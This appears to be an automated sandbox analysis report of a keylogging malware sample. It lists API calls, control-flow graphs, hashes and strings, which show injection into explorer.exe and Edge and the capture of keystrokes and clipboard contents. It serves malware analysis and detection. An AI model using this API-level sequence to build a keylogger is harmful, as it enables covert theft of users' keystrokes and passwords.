                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Offset: 00111000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_111000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2482764027-0
                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction ID: dd0da7d39569dec89635c487e04e7ac08a6f59abdfd467c401fbcf33bce1dc22
                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction Fuzzy Hash: F18143312186088FEB1AEF54EC58BEBB7A1FB50740F44466AE453C7164EF78DA44CB81

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 68 11a048-11a04b 69 11a055-11a059 68->69 70 11a065 69->70 71 11a05b-11a063 69->71 72 11a067 70->72 73 11a04d-11a053 70->73 71->70 74 11a06a-11a071 72->74 73->69 76 11a073-11a07b 74->76 77 11a07d 74->77 76->77 77->74 78 11a07f-11a082 77->78 79 11a084-11a092 78->79 80 11a097-11a0a4 78->80 81 11a094-11a095 79->81 82 11a0ce-11a0e9 79->82 92 11a0a6-11a0a8 80->92 93 11a0be-11a0cc call 11a00a 80->93 81->80 83 11a11a-11a11d 82->83 85 11a122-11a129 83->85 86 11a11f-11a120 83->86 87 11a12f-11a133 85->87 89 11a101-11a105 86->89 90 11a190-11a1e4 VirtualProtect * 2 87->90 91 11a135-11a14e LoadLibraryA 87->91 94 11a107-11a10a 89->94 95 11a0eb-11a0ee 89->95 101 11a1e8-11a1ed 90->101 97 11a14f-11a156 91->97 99 11a0ab-11a0b2 92->99 93->69 94->85 100 11a10c-11a110 94->100 95->85 98 11a0f0 95->98 97->87 103 11a158 97->103 104 11a0f1-11a0f5 98->104 114 11a0b4-11a0ba 99->114 115 11a0bc 99->115 100->104 105 11a112-11a119 100->105 101->101 106 11a1ef-11a1fe 101->106 107 11a164-11a16c 103->107 108 11a15a-11a162 103->108 104->89 109 11a0f7-11a0f9 104->109 105->83 112 11a16e-11a17a 107->112 108->112 109->89 113 11a0fb-11a0ff 109->113 117 11a185-11a18f 112->117 118 11a17c-11a183 112->118 113->89 113->94 114->115 115->93 115->99 118->97
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 0011A147
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0011A1BB
                                                                        • VirtualProtect.KERNELBASE ref: 0011A1D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4137644244.0000000000117000.00000040.80000000.00040000.00000000.sdmp, Offset: 00117000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_117000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction ID: bbafcfb999a9ba32b3b885fe3cdfdab83207de1524ecb9580b7ca717c01bba23
                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction Fuzzy Hash: 2B516C31359A1D1ACB2CAA389CD46F5BBC1EF59325F94073AD48AC3285D759D8C68383

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00A320A1 20 Function_00A329BD 0->20 22 Function_00A3243D 0->22 25 Function_00A3298A 0->25 27 Function_00A32A09 0->27 29 Function_00A3240F 0->29 30 Function_00A3288D 0->30 36 Function_00A329EB 0->36 43 Function_00A324CC 0->43 1 Function_00A33627 2 Function_00A31E26 18 Function_00A31CBF 2->18 3 Function_00A31B26 4 Function_00A310A5 5 Function_00A32724 4->5 9 Function_00A312AE 4->9 10 Function_00A326AE 4->10 17 Function_00A318BF 4->17 4->27 28 Function_00A3268F 4->28 4->30 4->36 39 Function_00A3276D 4->39 41 Function_00A32841 4->41 42 Function_00A326C9 4->42 44 Function_00A3275A 4->44 6 Function_00A325A4 6->27 7 Function_00A3162B 16 Function_00A316B9 7->16 8 Function_00A329AE 9->8 9->20 9->27 9->36 38 Function_00A32569 9->38 9->41 47 Function_00A3255C 9->47 11 Function_00A313AE 15 Function_00A31F3A 11->15 26 Function_00A31E89 11->26 11->27 33 Function_00A32799 11->33 11->36 40 Function_00A325F1 11->40 12 Function_00A3182D 12->6 12->8 12->27 31 Function_00A3200D 12->31 12->36 13 Function_00A31533 14 Function_00A31FB4 14->2 15->14 15->20 35 Function_00A31E66 15->35 37 Function_00A31FEA 15->37 16->36 48 Function_00A317DC 16->48 17->3 17->5 21 Function_00A31BBD 17->21 19 Function_00A3293E 19->27 19->36 22->25 22->27 23 Function_00A31581 23->5 23->16 23->19 23->27 23->36 24 Function_00A31000 32 Function_00A31016 24->32 26->5 26->37 45 Function_00A31ED8 26->45 29->41 31->0 31->27 31->36 32->4 32->5 32->9 32->10 32->11 32->17 32->27 32->28 32->30 32->36 32->39 32->41 32->42 32->44 34 Function_00A39AE0 35->18 36->5 46 Function_00A329DF 46->5 48->27

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00A32724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00A329F3,-00000001,00A3128C), ref: 00A32731
                                                                          • Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                          • Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00A31038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A3106C
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00A31075
                                                                        • GetCurrentProcessId.KERNEL32(?,00A31010), ref: 00A3107B
                                                                        • wsprintfA.USER32 ref: 00A310E7
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00A31155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A31160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 00A3117F
                                                                        • CharLowerA.USER32(?), ref: 00A31199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00A311B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00A31212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00A3126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A3127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 00A3129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3206029838-2805246637
                                                                        • Opcode ID: 4e9c04818b764ca5a870278afbf051fbf876cdeb1d726315fc7a6daa8fc0b599
                                                                        • Instruction ID: e62be71cc4617bdc9e2df5264b0daa7128ae412ad49f69f2262cfb138b7c7f6c
                                                                        • Opcode Fuzzy Hash: 4e9c04818b764ca5a870278afbf051fbf876cdeb1d726315fc7a6daa8fc0b599
                                                                        • Instruction Fuzzy Hash: D051F971A083019FCB18EFF4DD85ABB77A9FF45740F000628F955872A1EB359E468B61

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                          • Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                        • wsprintfA.USER32 ref: 00A310E7
                                                                          • Part of subcall function 00A3276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00A32777
                                                                          • Part of subcall function 00A3276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00A310FE), ref: 00A32789
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00A31155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A31160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 00A3117F
                                                                        • CharLowerA.USER32(?), ref: 00A31199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00A311B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00A31212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00A3126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A3127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 00A3129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3018447944-2805246637
                                                                        • Opcode ID: 374791c8e0304b29853138f8d2d7dccbaffb8232cc7efe793fe26ee65a9a7335
                                                                        • Instruction ID: ff5d25ca12b43a898824219a3bca490a11b70e254c587e6855f7add5084a1991
                                                                        • Opcode Fuzzy Hash: 374791c8e0304b29853138f8d2d7dccbaffb8232cc7efe793fe26ee65a9a7335
                                                                        • Instruction Fuzzy Hash: E041C6716083015FDB18EFF49D85ABF77A9EF85744F000A28F956872E1EB349E068B61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 122 a39ae0-a39ae5 123 a39aeb-a39af8 122->123 124 a39cad 122->124 125 a39b0a-a39b0f 123->125 124->124 126 a39b11 125->126 127 a39b13 126->127 128 a39b00-a39b05 126->128 130 a39b18-a39b1a 127->130 129 a39b06-a39b08 128->129 129->125 129->126 131 a39b23-a39b27 130->131 132 a39b1c-a39b21 130->132 131->130 133 a39b29 131->133 132->131 134 a39b34-a39b39 133->134 135 a39b2b-a39b32 133->135 136 a39b3b-a39b44 134->136 137 a39b48-a39b4a 134->137 135->130 135->134 138 a39b46 136->138 139 a39bba-a39bbd 136->139 140 a39b53-a39b57 137->140 141 a39b4c-a39b51 137->141 138->137 142 a39bc2-a39bc5 139->142 143 a39b60-a39b62 140->143 144 a39b59-a39b5e 140->144 141->140 145 a39bc7-a39bc9 142->145 146 a39b84-a39b93 143->146 147 a39b64 143->147 144->143 145->142 150 a39bcb-a39bce 145->150 148 a39b95-a39b9c 146->148 149 a39ba4-a39bb1 146->149 151 a39b65-a39b67 147->151 148->148 152 a39b9e 148->152 149->149 153 a39bb3-a39bb5 149->153 150->142 154 a39bd0-a39bec 150->154 155 a39b70-a39b74 151->155 156 a39b69-a39b6e 151->156 152->129 153->129 154->145 158 a39bee 154->158 155->151 157 a39b76 155->157 156->155 159 a39b81 157->159 160 a39b78-a39b7f 157->160 161 a39bf4-a39bf8 158->161 159->146 160->151 160->159 162 a39bfa-a39c10 LoadLibraryA 161->162 163 a39c3f-a39c42 161->163 164 a39c11-a39c16 162->164 165 a39c45-a39c4c 163->165 164->161 166 a39c18-a39c1a 164->166 167 a39c70-a39ca0 VirtualProtect * 2 165->167 168 a39c4e-a39c50 165->168 169 a39c23-a39c30 GetProcAddress 166->169 170 a39c1c-a39c22 166->170 173 a39ca4-a39ca8 167->173 171 a39c63-a39c6e 168->171 172 a39c52-a39c61 168->172 174 a39c32-a39c37 169->174 175 a39c39-a39c3c 169->175 170->169 171->172 172->165 173->173 176 a39caa 173->176 174->164 176->124
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A38000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A38000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a38000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 347baeb57d02b389b76709ebf1a487e83cb2a3edea4ea9fc7bad12da36fac416
                                                                        • Instruction ID: dcf1e72348de98742f1c2b082615ff171c0c3c8e5e70dd98d76220dd1991c37f
                                                                        • Opcode Fuzzy Hash: 347baeb57d02b389b76709ebf1a487e83cb2a3edea4ea9fc7bad12da36fac416
                                                                        • Instruction Fuzzy Hash: B351E471A542524ED7219E78DCC07A2F7A4EB52320F280739E5E6CB3C6E7E45C06C7A0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 177 a3276d-a3277f OpenFileMappingA 178 a32781-a32791 MapViewOfFile 177->178 179 a32794-a32798 177->179 178->179
                                                                        APIs
                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00A32777
                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00A310FE), ref: 00A32789
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$MappingOpenView
                                                                        • String ID:
                                                                        • API String ID: 3439327939-0
                                                                        • Opcode ID: 3974d0c4c34ad6474f3586752a9fa964b75ec9fea9726ec4f0e324b09bac49c9
                                                                        • Instruction ID: 819a18cf1c87264edc3d70e70fa1ac4d98f5c312a9d92fdd89cda1d052fc4fdb
                                                                        • Opcode Fuzzy Hash: 3974d0c4c34ad6474f3586752a9fa964b75ec9fea9726ec4f0e324b09bac49c9
                                                                        • Instruction Fuzzy Hash: 4BD01732709231BBE7389BBB6C0CF87AE9DDF86AE1B010025B50DD2150D6608811C2F0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 180 a3275a-a3276c UnmapViewOfFile CloseHandle
                                                                        APIs
                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,00A3129A,00000001), ref: 00A3275E
                                                                        • CloseHandle.KERNELBASE(?,?,00A3129A,00000001), ref: 00A32765
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFileHandleUnmapView
                                                                        • String ID:
                                                                        • API String ID: 2381555830-0
                                                                        • Opcode ID: 18c715c93cd34100283f9cb2e5114f13c5f0a04b88ae8955454cab8b5705996c
                                                                        • Instruction ID: a2473d42f14b086bb20d1673ebbdeaa4597d374709832cd331544594150d15c8
                                                                        • Opcode Fuzzy Hash: 18c715c93cd34100283f9cb2e5114f13c5f0a04b88ae8955454cab8b5705996c
                                                                        • Instruction Fuzzy Hash: 1FB0123340D03097CB1CE7B47D0C8DF3E18EE4B2213050145F10E8102047280E4386E8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 181 a32a09-a32a19 GetProcessHeap RtlAllocateHeap
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: c3179aa5313d51b1001544ed1dcf1b158ead25b312e2ceb8289c860523571044
                                                                        • Instruction ID: 30a7af838e563db3705b8e7721cea680d55e7c5e236527240750d2ab72e411a7
                                                                        • Opcode Fuzzy Hash: c3179aa5313d51b1001544ed1dcf1b158ead25b312e2ceb8289c860523571044
                                                                        • Instruction Fuzzy Hash: 7CA002B26546006BDD4C97E4AD4DF157658AB45702F0045447246C50509D7555458761

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00A32724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00A329F3,-00000001,00A3128C), ref: 00A32731
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 00A318F4
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00A3192F
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00A319BF
                                                                        • RtlMoveMemory.NTDLL(00000000,00A33638,00000016), ref: 00A319E6
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00A31A0E
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00A31A1E
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A31A38
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00A31A40
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31A4E
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31A55
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00A31A6B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A31A72
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31A88
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31AB2
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A31AC5
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31ACC
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31AD3
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31AE7
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A31AFE
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B0B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B11
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B17
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A31B1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: atan$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-2737717697
                                                                        • Opcode ID: 694bface864641738dd601d964ce44847f923ea4567cd6fa49b1a13ee586c4c7
                                                                        • Instruction ID: 9efe10f6c50c2d5ade56c36f9289ceb58970c11df9dd8ac3040289aa306b2da8
                                                                        • Opcode Fuzzy Hash: 694bface864641738dd601d964ce44847f923ea4567cd6fa49b1a13ee586c4c7
                                                                        • Instruction Fuzzy Hash: B261BC72608304AFDB14DFA4DD84E6BBBECEB89754F000529F949D3291DB74DE058BA2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00A327B5
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00A327CD
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 00A327D5
                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00A327E0
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00A327FA
                                                                        • wsprintfA.USER32 ref: 00A32811
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00A3282A
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A32834
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 9ce257f51e35fa85cd507eba8e89f93337d802ced48e3be338224a98031249d2
                                                                        • Instruction ID: ab817797e2f672bcb18135601f9d3f3b05373753d5d8e369f60a12dd1cc998f5
                                                                        • Opcode Fuzzy Hash: 9ce257f51e35fa85cd507eba8e89f93337d802ced48e3be338224a98031249d2
                                                                        • Instruction Fuzzy Hash: 351116B2904108BFEB21DBD5ED88EEEBBBCEB49311F104065FA05E2160D6754F569B60
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00A31652
                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 00A3167A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardStateUnicode
                                                                        • String ID:
                                                                        • API String ID: 3453085656-3916222277
                                                                        • Opcode ID: 425a6dbc9ca9c0e55ca362db9ec8f64889585357d62fbf50e73a69c8f0a7b3a0
                                                                        • Instruction ID: 1b15b8ef61af405e134bbfed3c74627e1c7442709a7af647bd57c7a27dfc860b
                                                                        • Opcode Fuzzy Hash: 425a6dbc9ca9c0e55ca362db9ec8f64889585357d62fbf50e73a69c8f0a7b3a0
                                                                        • Instruction Fuzzy Hash: 300180729006199BDF34CB95DD47BFBB3BCAF45B00F08441AF901E2151D734E9459AA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(00A35013,0000001C), ref: 00A313C8
                                                                        • VirtualQuery.KERNEL32(00A313AE,?,0000001C), ref: 00A313DA
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00A3140B
                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 00A3141C
                                                                        • wsprintfA.USER32 ref: 00A31433
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00A31448
                                                                        • GetLastError.KERNEL32 ref: 00A3144E
                                                                        • RtlInitializeCriticalSection.NTDLL(00A3582C), ref: 00A31465
                                                                        • Sleep.KERNEL32(000001F4), ref: 00A31489
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 00A314A6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A314AF
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 00A314D0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A314D3
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00A314F1
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 00A3150D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A31514
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00A3152A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                        • API String ID: 3628807430-1779906909
                                                                        • Opcode ID: cf05a8f4c4459f0d1b011c66ab411a5dceddcb37f96d97e550663592824a6f4c
                                                                        • Instruction ID: 5877342a73c9e8e8b3da3664e2b1e49437c1802a2708712f5b7382aff9814bd8
                                                                        • Opcode Fuzzy Hash: cf05a8f4c4459f0d1b011c66ab411a5dceddcb37f96d97e550663592824a6f4c
                                                                        • Instruction Fuzzy Hash: 0641C171A04304BFDB14EBF9ED0AE6A7BACFB86751F004419F50687251CB76DA028BA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(00A3582C), ref: 00A316C4
                                                                        • lstrlenW.KERNEL32 ref: 00A316DB
                                                                        • lstrlenW.KERNEL32 ref: 00A316F3
                                                                        • wsprintfW.USER32 ref: 00A31743
                                                                        • GetForegroundWindow.USER32 ref: 00A3174E
                                                                        • GetWindowTextW.USER32(00000000,00A35850,00000800), ref: 00A31767
                                                                        • GetClassNameW.USER32(00000000,00A35850,00000800), ref: 00A31774
                                                                        • lstrcmpW.KERNEL32(00A35020,00A35850), ref: 00A31781
                                                                        • lstrcpyW.KERNEL32(00A35020,00A35850), ref: 00A3178D
                                                                        • wsprintfW.USER32 ref: 00A317AD
                                                                        • lstrcatW.KERNEL32 ref: 00A317C6
                                                                        • RtlLeaveCriticalSection.NTDLL(00A3582C), ref: 00A317D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                        • API String ID: 2651329914-3371406555
                                                                        • Opcode ID: 171b2d018834b5fe98079ecaa057bb704dd845f92e59305381d89a590d827004
                                                                        • Instruction ID: a731afc3ff68923962d77cbcfd361aa6a3a393c19996f2bf1697e1197a8f1f4b
                                                                        • Opcode Fuzzy Hash: 171b2d018834b5fe98079ecaa057bb704dd845f92e59305381d89a590d827004
                                                                        • Instruction Fuzzy Hash: 8321C936E04614BFDB25ABB9FD89E2F3F68FB42B55F084424F40192161DB168E039BB5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00A32603
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00A3260B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00A3261B
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 00A32629
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00A32648
                                                                        • SuspendThread.KERNEL32(00000000), ref: 00A32658
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A32667
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00A32677
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A32682
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: 9c6f7c85dcfe515bec4937543dfdece2a9f4dae248fbdda46fa9b6d7ef03c15e
